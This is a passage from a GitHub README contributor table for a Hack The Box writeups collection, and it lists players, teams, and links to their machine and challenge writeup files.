| <img src="./images/countries/italy.png" height="24" width="24"> | luthorien | [<img src="./images/luthorien.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/48306) | [ARGSS](https://www.hackthebox.eu/home/teams/profile/1032) | | [Not Art, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Not%20Art/luthorien-not_art.pdf) [Grammar, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/grammar/luthorien-grammar.pdf) [Hidden in Colors](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Hidden%20in%20Colors/luthorien-hiddenincolors.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | Pepelu | [<img src="./images/pepelu.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/105086) | Solitaire wolf | [Player, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Player/josehares-Player.pdf) [Craft](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/josehares-Craft.pdf)| | <img src="./images/countries/spain.png" height="24" width="24"> | w4tchw0lf | [<img src="./images/w4tchw0lf.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/7545) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | | [BitsNBytes,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/BitsNBytes/w4tchw0lf-bitsNbytes.pdf) [Monstrosity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Monstrosity/w4tchw0lf-Monstruosity.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | SadFud | [<img src="./images/sadfud.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/4180) | solitaire wolf | | [Impossible Password,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Impossible_password/sadfud-impossible_password.pdf) [Find the easy pass](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Find_the_easy_pass/sadfud_Find_the_easy_pass.pdf) | <img src="./images/countries/usa.png" height="24" width="24"> | epi | [<img src="./images/epi.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/20228) | [Hackmethod](https://www.hackthebox.eu/home/teams/profile/64) | [Ypuffy, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ypuffy/epi-ypuffy.pdf) [SwagShop](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/SwagShop/epi-swagshop.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | v3he | [<img src="./images/v3he.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/4733) | solitaire wolf | | [Old Bridge, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/old_bridge/vehe-old-bridge.zip) [ropmev2](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropmev2/vehe-ropmev2.zip)| <img src="./images/countries/india.png" height="24" width="24"> | 3l33t | [<img src="./images/3l33t.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/116380) | solitaire wolf | [Safe, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Safe/3l33t-safe.pdf) [Jarvis, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/3l33t-jarvis.pdf) [Player, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Player/3l33t-player.pdf) [Craft](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Craft/3l33t-craft.pdf) | | <img src="./images/countries/canada.png" height="24" width="24"> | thecapo | [<img src="./images/thecapo.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/68475) | Solitaire wolf | [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Forest/Capo2019Forrest.pdf) [Heist](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Heist/SirBroccoli-Heist.pdf) | | <img src="./images/countries/holland.png" height="24" width="24"> | wezzlaren | [<img src="./images/wezzlaren.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/113325) | [Hacky](https://www.hackthebox.eu/home/teams/profile/1958) | [Mango, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/wezzlaren-Mango-writeup.pdf) [Postman](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Postman/wezzlaren-Postman-writeup.pdf) | | <img src="./images/countries/uk.png" height="24" width="24"> | egotisticalSW | [<img src="./images/egotisticalSW.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/94858) | Solitaire wolf | [Heist, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Heist/egotisticalSW-Heist.pdf) [Traverxec, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/egotisticalSW-Traverxec.pdf) [Obscurity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/egostisticalSW-Obscurity.pdf) | | <img src="./images/countries/canada.png" height="24" width="24"> | DarkNight2019 | [<img src="./images/Darknight2019.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/127667) | [T0pt33m](https://www.hackthebox.eu/home/teams/profile/1637) | [Forest, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Forest/Darknight2019-forest.pdf) [Registry](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Registry/Darknight2019-Registry.pdf) | | <img src="./images/countries/canada.png" height="24" width="24"> | retrocraft | [<img src="./images/retrocraft.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/222747) | Solitaire wolf | [Obscurity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/retrocraft-Obscurity.pdf), [Traverxec](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/retrocraft-Traverxec.pdf) | | <img src="./images/countries/Romania.png" height="24" width="24"> | BananaPr1nc3 | [<img src="./images/bananapr1nc3.webp" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/48172) | Solitaire wolf | [Traverxec](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/BananaPr1nc3-Traverxec.pdf) | [DSYM](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/DSYM/NucuLabs%20DSYM.pdf)| <img src="./images/countries/poland.png" height="24" width="24"> | offk0rs | [<img src="./images/MemoryLeaks.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/19242) | [MemoryLeaks](https://www.hackthebox.eu/home/teams/profile/1680) | [Safe,](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Safe/MemoryLeaks-Safe.pdf) [Ellingson, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ellingson/MemoryLeaks-Ellingson.pdf) [Jarvis](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jarvis/MemoryLeaks-Jarvis.pdf) | | <img src="./images/countries/malaysia.png" height="24" width="24"> | Jacker31 | [<img src="./images/Jacker31.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/72484) | [NightTrain](https://www.hackthebox.eu/home/teams/profile/1498) | [Heist](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Heist/Jacker31-Heist.pdf), [OpenAdmin](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/Jacker31-OpenAdmin.pdf), [Arkham](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Arkham/Jacker31-Arkham.pdf), [Book](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Book/Jacker31-Book.pdf)| | <img src="./images/countries/egypt.png" height="24" width="24"> | Mrx-Exploit | [<img src="./images/mrx-Exploit.png" height="42" width="42">](https://www.hackthebox.eu/users/homeprofile/47422) | [TCLRED](https://www.hackthebox.eu/home/teams/profile/1709) | [Traverxec](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traverxec/Mrx-Exploit(Traverxec)-protected.pdf) | [Ezpz](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/ezpz/Mrx-Exploit(Ezpz-Writeup).pdf) | <img src="./images/countries/world.png" height="24" width="24"> | ypl | [<img src="./images/ypl.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/262148) | Solitaire wolf | | [Ropme](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropme/ypl-ropme.zip), [ropmev2](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropmev2/ypl-ropmev2.zip) | <img src="./images/countries/world.png" height="24" width="24"> | xiaobye | [<img src="./images/xiaobye.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/220694) | Solitaire Wolf | [OpenAdmin, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/OpenAdmin/xiaobye-openadmin.pdf) [Mango, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mango/xiaobye-Mango.pdf) [Obscurity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/xiaobye-obscurity.pdf) | <img src="./images/countries/israel.png" height="24" width="24"> | ghsi10 | [<img src="./images/ghsi10.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/203581) | solitaire wolf || [You know 0xDiablos, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/You_know_0xDiablos/ghsi10-0xDiablos.zip) [Console, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Console/ghsi10-Console.pdf) [bad_grades](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/bad_grades/ghsi10-bad_grades.zip)| | <img src="./images/countries/austria.png" height="24" width="24"> | h4ckd0tm3 | [<img src="https://www.hackthebox.eu/storage/avatars/b0df7f54ae84c3e100a6d78c55d48688.png" height="42" width="42">](https://www.hackthebox.eu/profile/232834) | SickaLoot | | [Unprintable](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Unprintable/h4ckd0tm3_Unprintable.pdf), [QuickR](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/misc/QuickR/h4ckd0tm3_QuickR.pdf) <img src="./images/countries/india.png" height="24" width="24"> | Segf4ul7 | [<img src="./images/Segf4ul7.png" height="42" width="42">](https://www.hackthebox.eu/profile/201892) | Solitaire Wolf | | [You know 0xDiablos, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/You_know_0xDiablos/Segf4ul7-0xDiablos.zip) [ropme, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropme/Segf4ul7-ropme.zip) [ropmev2, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropmev2/Segf4ul7-ropmev2.zip) [Little Tommy](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/Little%20Tommy/Segf4ul7-Little-Tommy.zip) <img src="./images/countries/uk.png" height="24" width="24"> | hyperreality | [<img src="./images/hyperreality.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/49704) | Solitaire wolf | | [Optimus Prime](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Optimus_Prime/hyperreality-optimus-prime.zip), [RsaCtfTool](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/RsaCtfTool/hyperreality-rsactftool.zip) | <img src="./images/countries/world.png" height="24" width="24"> | DaWoschbar | [<img src="./images/DaWoschbar.jpg" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/140734) | [SickaLoot](https://www.hackthebox.eu/home/teams/profile/2538) | [Sauna, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sauna/DaWoschbar-Sauna.pdf) [Traceback](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Traceback/DaWoschbar-Traceback.pdf)| <img src="./images/countries/brazil.png" height="24" width="24"> | ebaitello | [<img src="./images/ebaitello.webp" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/401742) | Solitaire wolf | | [Cat, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/ebaitello_cat.pdf) [Missing in Action](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/OSINT/Missing%20in%20Action/ebaitello_missing-in-action.pdf) | <img src="./images/countries/malaysia.png" height="24" width="24"> | Ap0k4L1p5 | [<img src="./images/prof.png" height="42" width="42">](https://app.hackthebox.eu/profile/105032) | [ALTr34lity](https://www.hackthebox.eu/home/teams/profile/3056) | [Admirer](https://github.com/Ap0k4L1p5/hackthebox-writeups/blob/master/machines/Admirer/HTB-Admirer_AE13.pdf) | [Cryptohorrific](https://github.com/Ap0k4L1p5/hackthebox-writeups/blob/master/challenges/mobile/HTB-Cryptohorrific_AE13.pdf) | <img src="./images/countries/india.png" height="24" width="24"> | blankdash | [<img src="./images/blankdash.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/94486) | [VoidUnity](https://www.hackthebox.eu/home/teams/profile/2413) | [obscurity](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Obscurity/blankdash_obscurity.pdf) | [Reminiscent](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/Reminiscent.pdf), [MarketDump](https://github.com/Karma47/hackthebox-writeups/blob/master/challenges/forensics/blankdash-MarketDump.pdf) | <img src="./images/countries/russia.png" height="24" width="24"> | snovvcrash | [<img src="./images/snovvcrash.jpg" height="42" width="42">](https://www.hackthebox.eu/profile/51037) | Solitaire Wolf | [Hades](https://github.com/Hackplayers/hackthebox-writeups/blob/master/endgames/Hades/snovvcrash-Hades.pdf), [RPG](https://github.com/Hackplayers/hackthebox-writeups/blob/master/endgames/RPG/snovvcrash-RPG.pdf), [Ascension](https://github.com/Hackplayers/hackthebox-writeups/blob/master/endgames/Ascension/snovvcrash-Ascension.pdf), [Odyssey](https://github.com/Hackplayers/hackthebox-writeups/blob/master/endgames/Odyssey/snovvcrash-Odyssey.pdf) | <img src = "./images/countries/germany.png" height="24" width="24"> | d4rkc0nd0r | [<img src = "./images/lulzsec.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/266518) | [AlphaPwners](https://www.hackthebox.eu/home/teams/profile/673) | | [TwoForOne](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/TwoForOne/d4rkc0nd0r-TwoForOne.pdf), [Emo](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/d4rkc0nd0r-emo.pdf), [Bare Metal](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/Hardware/Bare_Metal.pdf) | <img src="./images/countries/turkey.png" height="24" width="24"> | islamukheef | [<img src="./images/islamukheef.png" height="42" width="42">](https://www.hackthebox.eu/profile/290123) | Solitaire Wolf | | [Baby RE, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/Baby%20RE/IslaMukheef%20-Baby%20RE.pdf) [HackyBird](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/HackyBird/IslaMukheef-HackyBird.pdf) | <img src="./images/countries/india.png" height="24" width="24"> | sp00fexpl01t | [<img src="./images/sp00fexpl01t.png" height="42" width="42">](https://www.hackthebox.eu/profile/415817) | Solitaire Wolf | [Sharp](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sharp/Sharp-sp00fexpl01t.pdf) | [Phonebook](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Phonebook/Phonebook-sp00fexpl01t.pdf), [LoveTok](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/LoveTok/LoveTok-sp00fexpl01t.pdf), [petpet rcbee](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/petpet%20rcbee/petpet_rcbee-sp00fexpl01t.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | hacefresko | [<img src="./images/hacefresko.png" height="42" width="42">](https://www.hackthebox.eu/profile/207428) | Solitaire Wolf | | [Weather App](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Weather%20App/hacefresko_weather_app.pdf), [baby ninja jinja](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/baby%20ninja%20jinja/hacefresko_baby_ninja_jinja.pdf), [Breaking Grad](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/breaking%20grad/hacefresko_breaking_grad.pdf), [BoneChewerCon](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/BoneChewerCon/hacefresko_bonechewercon.pdf) | <img src="./images/countries/canada.png" height="24" width="24"> | ejedev | [<img src="./images/ejedev.png" height="42" width="42">](https://www.hackthebox.eu/profile/280547) | Solitaire Wolf | | [Toxic](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/web/Toxic/Toxic-Writeup-ejedev.pdf), [APKey](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/APKey-Writeup-ejedev.zip), [SeeTheSharpFlag](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/SeeTheSharpFlag-Writeup-ejedev.zip), [PersistenceIsFutile](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/forensics/PersistenceIsFutile-Writeup-ejedev.zip) | <img src="./images/countries/chile.png" height="24" width="24"> | D-Cryp7 | [<img src="./images/D-Cryp7.png" height="42" width="42">](https://www.hackthebox.com/home/users/profile/111439) | Solitaire Wolf | | [RSAisEasy](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/RSAisEasy/RSAisEasy_D-Cryp7.zip), [xorxorxor](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/xorxorxor/xorxorxor_D-Cryp7.zip), [Birds of randomness](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Birds%20of%20randomness/D-Cryp7%20-%20Birds%20of%20randomness%20[ENG].zip) <img src="./images/countries/ukraine.png" height="24" width="24"> | danylokos | [<img src="./images/danylokos.png" height="42" width="42">](https://app.hackthebox.com/users/877352) | Solitaire Wolf | | [SAW](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/htb-mobile-saw-writeup.pdf), [Joker](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/htb-mobile-joker.pdf), [Waiting](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/htb-mobile-waiting.pdf) # Fleeting contributors (1 writeup) Ctry | nick | avatar | team | machines | challenges --- | --- | --- | --- | --- | --- <img src="./images/countries/kosovo.png" height="24" width="24"> | absolutezero | [<img src="./images/absolutezero.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/37317) | [Sentry](https://www.hackthebox.eu/home/teams/profile/637) | [Fighter](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Fighter/absolutezero-fighter.pdf) | | <img src="./images/countries/world.png" height="24" width="24"> | xephrox | [<img src="./images/xephrox.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/410) | solitaire wolf | [Mischief](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mischief/xephrox_Mischief.zip) | <img src="./images/countries/usa.png" height="24" width="24"> | worldunruled | [<img src="./images/worldunruled.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/8767) | [hackmethod](https://www.hackthebox.eu/home/teams/profile/64) | [Active](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/worldunruled-active.pdf) | <img src="./images/countries/usa.png" height="24" width="24"> | rtheory | [<img src="./images/rtheory.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/20100) | [FlavorTown](https://www.hackthebox.eu/home/teams/profile/531) | [Reddish](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Reddish/rtheory-reddish.pdf) | <img src="./images/countries/uk.png" height="24" width="24"> | thereverend | [<img src="./images/thereverend.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/53369) | solitaire wolf | [Active](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Active/thereverend-active.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | Zaiuss | [<img src="./images/zaiuss.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/6954) | [L1k0rD3B3ll0t4](https://www.hackthebox.eu/home/teams/profile/149) | [Celestial](https://github.com/Hackplayers/hackthebox-writeups/raw/master/machines/Celestial/zaiuss-celestial.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | attl4s | [<img src="./images/attl4s.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/22983) | [juankeres](https://www.hackthebox.eu/home/teams/profile/160) | [Falafel](https://github.com/Hackplayers/hackthebox-writeups/tree/master/machines/Falafel/attl4s-falafel.pdf) | <img src="./images/countries/world.png" height="24" width="24"> | kauffman | [<img src="./images/kauffman.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/21796) | solitaire wolf | [Poison](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Poison/kauffman-poison.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | revil | [<img src="./images/revil.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/11855) | solitaire wolf | [Sunday](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sunday/revil-sunday.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | k4nj1d | [<img src="./images/k4nj1d.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/2027) | solitaire wolf | [nibbles](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Nibbles/k4nj1d-nibbles.pdf) | <img src="./images/countries/italy.png" height="24" width="24"> | giovii | [<img src="./images/giovii.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/1527) | [criuz](https://www.hackthebox.eu/home/teams/profile/621) | [Mischief](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mischief/giovii-mischief.pdf) | <img src="./images/countries/world.png" height="24" width="24"> | 3zculprit | [<img src="./images/3zculprit.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/18521) | solitaire wolf | [Olympus](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Olympus/3zculprit-mischief.pdf) | <img src="./images/countries/greece.png" height="24" width="24"> | FuxSocy | [<img src="./images/fuxsocy.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/4180) | [PhobosGroup](https://www.hackthebox.eu/home/teams/profile/177) | [Dev0ops](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/DevOops/fux-DevOops.pdf) | | <img src="./images/countries/usa.png" height="24" width="24"> | abselithat | [<img src="./images/abselithat.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/11160) | [Pratum](https://www.hackthebox.eu/home/teams/profile/666) | [Chatterbox](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Chatterbox/chadporter1-chatterbox.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | Killerloops | [<img src="./images/killerloops.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/4180) | [prosegur](https://www.hackthebox.eu/home/teams/profile/79) | | [Tear or dear](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/reversing/tearordear/killerloops-tearordear.pdf) | <img src="./images/countries/italy.png" height="24" width="24"> | Renero | [<img src="./images/renero.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/5420) | [criuz](https://www.hackthebox.eu/home/teams/profile/621) | | [Digital Cube](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/stego/Digital_Cube/renero-digitalcube.pdf) | <img src="./images/countries/spain.png" height="24" width="24"> | Gibdeon | [<img src="./images/gibdeon.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/2226) | [PKTeam](https://www.hackthebox.eu/home/teams/profile/122) | | [Old Bridge](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/old_bridge/gibdeon-old_bridge.rar) | <img src="./images/countries/spain.png" height="24" width="24"> | therearwindow | [<img src="./images/therearwindow.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/27031) | solitaire wolf | | [Beatles](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Beatles/therearwindow-beatles.pdf) | <img src="./images/countries/russia.png" height="24" width="24"> | malwrecon | [<img src="./images/malwrecon.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/26829) | solitaire wolf | [Ypuffy](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Ypuffy/malwrecon-ypuffy.pdf) | | <img src="./images/countries/world.png" height="24" width="24"> | labyrinth | [<img src="./images/labyrinth.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/10971) | [badwolf](https://www.hackthebox.eu/home/teams/profile/999) | | [Ebola Virus](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/ebola/labyrinth-ebola.pdf) | | <img src="./images/countries/world.png" height="24" width="24"> | zdravich | [<img src="./images/zdravich.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/48306) | [TMHC](https://www.hackthebox.eu/home/teams/profile/709) | [Carrier](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Carrier/zdravich-carrier.pdf) | [Mission Impossible](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/crypto/Mission%20Impossible/Mission%20Impossible%20-%20zdravich.pdf) | <img src="./images/countries/montenegro.png" height="24" width="24"> | Wh04m1 | [<img src="./images/Wh04m1.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/94) | [YoRHa](https://www.hackthebox.eu/home/teams/profile/999) | | [Ropme](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/ropme/Wh04m1-ropme.zip) | | <img src="./images/countries/germany.png" height="24" width="24"> | coldBug | [<img src="./images/coldbug.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/3893) | [NeatMalwAreParty](https://www.hackthebox.eu/home/teams/profile/1006) | [Curling](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Curling/coldbug-curling.pdf) | | <img src="./images/countries/turkey.png" height="24" width="24"> | dionero | [<img src="./images/dionero.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/65313) | solitaire wolf | [Jerry](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Jerry/dionero-jerry.pdf) | | <img src="./images/countries/bangladesh.png" height="24" width="24"> | TheShahzada | [<img src="./images/TheShahzada.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/37502) | solitaire wolf | [Mischief](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Mischief/TheShahzada%20-%20Mischief.pdf) | | <img src="./images/countries/bangladesh.png" height="24" width="24"> | SadClown | [<img src="./images/sadclown.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/10505) | solitaire wolf | [Redcross](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Redcross/SadClown-RedCross.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | julianjm | [<img src="./images/julianjm.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/56525) | solitaire wolf | | [Old Bridge](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/pwn/old_bridge/julianjm-old_bridge.7z) | <img src="./images/countries/world.png" height="24" width="24"> | snowman418 | [<img src="./images/snowman418.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/61176) | solitaire wolf | [Reel](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Reel/snowman418-reel.pdf) | | <img src="./images/countries/Romania.png" height="24" width="24"> | jondow | [<img src="./images/jondow.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/51540) | [Bailando](https://www.hackthebox.eu/home/teams/profile/1057) | [Help](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Help/jondow-help.pdf) | | <img src="./images/countries/ukraine.png" height="24" width="24"> | lolfireball | [<img src="./images/Lolfireball.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/20891) | solitaire wolf | [Lightweight](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Lightweight/lolfireball-lightweight.pdf) | | <img src="./images/countries/canada.png" height="24" width="24"> | solsanctum | [<img src="./images/solsanctum.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/43421) | solitaire wolf | [Carrier](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Carrier/solsanctum-carrier.pdf) | | <img src="./images/countries/usa.png" height="24" width="24"> | fbbc | [<img src="./images/fbbc.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/96988) | solitaire wolf | [Conceal](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Conceal/fbbc-Conceal.pdf) | | <img src="./images/countries/colombia.png" height="24" width="24"> | 4lexag | [<img src="./images/4lexag.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/53043) | [EphorSec](https://www.hackthebox.eu/home/teams/profile/225) | | [Cryptohorrific_es, ](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/Cryptohorrific_es.pdf) [Cryptohorrific_en](https://github.com/Hackplayers/hackthebox-writeups/blob/master/challenges/mobile/Cryptohorrific_en.pdf) | <img src="./images/countries/cyprus.png" height="24" width="24"> | superhedgy | [<img src="./images/superhedgy.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/5769) | Solitaire wolf | [Netmon](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Netmon/superhedgy-Netmon_Walkthrough.pdf) | | <img src="./images/countries/mexico.png" height="24" width="24"> | blazz3 | [<img src="./images/blazz3.png" height="42" width="42">](https://www.hackthebox.eu/home/users/profile/28450) | [PwnD34L3rS](https://www.hackthebox.eu/home/teams/profile/920) | [Sizzle](https://github.com/Hackplayers/hackthebox-writeups/blob/master/machines/Sizzle/blazz3-sizzle.pdf) | | <img src="./images/countries/spain.png" height="24" width="24"> | Marduk | [<img src="./images/Marduk.png" height="42" 